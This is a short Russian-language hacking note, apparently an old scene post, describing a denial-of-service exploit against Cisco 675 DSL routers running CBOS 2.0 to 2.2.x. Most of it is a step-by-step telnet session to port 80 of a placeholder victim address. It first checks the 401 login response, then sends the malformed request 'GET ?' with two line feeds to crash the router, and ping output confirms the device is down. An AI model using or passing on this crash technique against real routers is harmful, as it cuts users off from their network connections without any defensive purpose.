DSL роутеры Cisco 675 с Web
Administration Interface можно легко завалить простой
командой GET. Ошибке подвержены роутеры с
версией CBOS с 2.0 до 2.2.х. Новая версия CBOS 2.3.x не
тестировалась, но вероятно и она также, так
как в ее описании не говорится об
исправлении этой ошибки.
Определяем наличие всех
необходимых для взлома компонент:
telnet vic.tim.ip.addr 80
Connected to vic.tim.ip.addr.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 401 Unauthorized
Content-type: text/html
WWW-Authenticate: Basic realm="CISCO_WEB"
< CENTER>< h1>Unauthorized Access 401< h1>< /center>
Убиваем:
telnet vic.tim.ip.addr 80
Trying vic.tim.ip.addr...
Connected to vic.tim.ip.addr.
Escape character is '^]'.
GET ? [LF][LF]
Сессия умирает, точно так
же как и подопытная Циска.
PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
5 packets transmitted, 0 packets received, 100% packet loss
